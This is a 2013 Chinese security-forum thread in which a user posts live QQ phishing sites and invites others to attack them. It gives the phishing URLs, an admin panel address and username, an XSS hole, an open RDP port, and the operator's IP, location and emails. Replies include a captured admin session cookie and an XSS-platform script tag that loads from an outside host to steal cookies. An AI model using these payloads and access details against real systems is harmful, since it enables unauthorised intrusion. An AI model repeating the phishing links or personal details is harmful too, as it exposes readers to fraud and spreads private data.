发两个qq钓鱼站点 求测试
白熊一枚 | 2013-07-21 23:18
第一个:
先给地址为敬:
kkk.sinotide.com.cn/www/1071vfghy-kmlo
第一个站点目测是个独服,ip为173.252.247.162,绑了大量的域名。后台是
http://173.252.247.162/img/index.asp
,用户名1071vfghy,也就是地址末尾的前半段。地址末尾后半段对应不同的钓鱼目标,比如kmlo是仿的qq空间
有xss漏洞,无狗。我进过后台,给一张截图。后台无可利用的地方。
后台主人登陆信息:
OS:Windows XP Browser:IE 8.0 REMOTE_ADDR: 180.138.5.137 Region: 广西南宁市电信 HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
后台用户名、钓鱼地址末尾经常变,如:
198sfdrt-kmlo,1028zasdx-lkop,898hjnmi-lkop,992fnjmu-kmlo,500afvyj-kmlo,1071vfghy-kmlo
钓鱼者邮箱为:
amani5201314@126.com yoyoangele777@hotmail.com
百度即可看到在各大出国留学生论坛发的帖子。
典型回信:
你好,放心吧价公道合适,房子最好是长租,不过短租好接受,那你先看下房间相片信息,合适的话我们再详谈好吗?房间相片信息地址:
http://kkk.zoktex.net.cn/www/500afvyj-kmlo
此套源码的特点是,
script language=javascript src='bHiF.asp' /script
,直接访问bHiF.asp会跳转百度。当然,浏览器访问主站然后用firebug之类的可以得到bHiF.asp真实源码。整套源码,包括后台都加密,解密语句即在bHiF.asp。
主站可扫端口,有3389开在7777如果没记错,还有一个端口,不多说了,自己玩吧。
第二个:
先给地址为敬:
ar.longfa888lipin.cn/duytc/index.asp?uid=115
类似地址很多,直接贴上
qe4dq.publicvm.com/uy7h/index.asp?uid=67 kdisksslls.terly.ru/urgtc/index.asp?uid=67 dispofpopf.v-tlt.ru/fbvd/index.asp?uid=93 http://www.longfa888lipin.cn/umdvd/index.asp?uid=93 cvioxc.mideasttravelling.net/loigf/index.asp?uid=104 http://sarwaawa.kz.com.ru/duytc/index.asp?uid=115 ar.longfa888lipin.cn/duytc/index.asp?uid=115
有狗,其他不知道了。
架在国外的钓鱼站,没人能管吧?这是个头疼事
相关讨论:
1#
白熊一枚 | 2013-07-22 00:14
这么快就不能编辑了?
更新第一个站的最新地址
http://sfdve.symy200911.cn/www/1261adsxz-kmlo
2#
萧然 (喜欢一切美的东西·) | 2013-07-22 01:04
@白熊一枚 这个站你xss了?
3#
白熊一枚 | 2013-07-22 01:07
@萧然 我不会,以上信息是别人提供的,只有链接是我找到的。后来那人觉得无聊,我才发到这里求继续
4#
凤凰 (凤凰涅磐,浴火重生) | 2013-07-22 10:58
南宁果然出人才
5#
VIP (Fatal error: Call to undefined function getwb() in /data1/www/htdocs/106/wzone/1/index.php on line 10|@齐迹) | 2013-07-22 13:39
已打下。
location : http://173.252.247.162/user/index.asp toplocation : http://173.252.247.162/user/index.asp cookie : ASPSESSIONIDSQARACDB=ACOEMOLBONCNFKPIFHIJLEIC
6#
小胖子 (我是小胖子,我为z7y代言!!) | 2013-07-22 13:43
@VIP
江西南昌的屌丝估计就是你了~~
<script src="http://xsserme.sinaapp.com/J5newT?1374461980"></script>
这~~~~~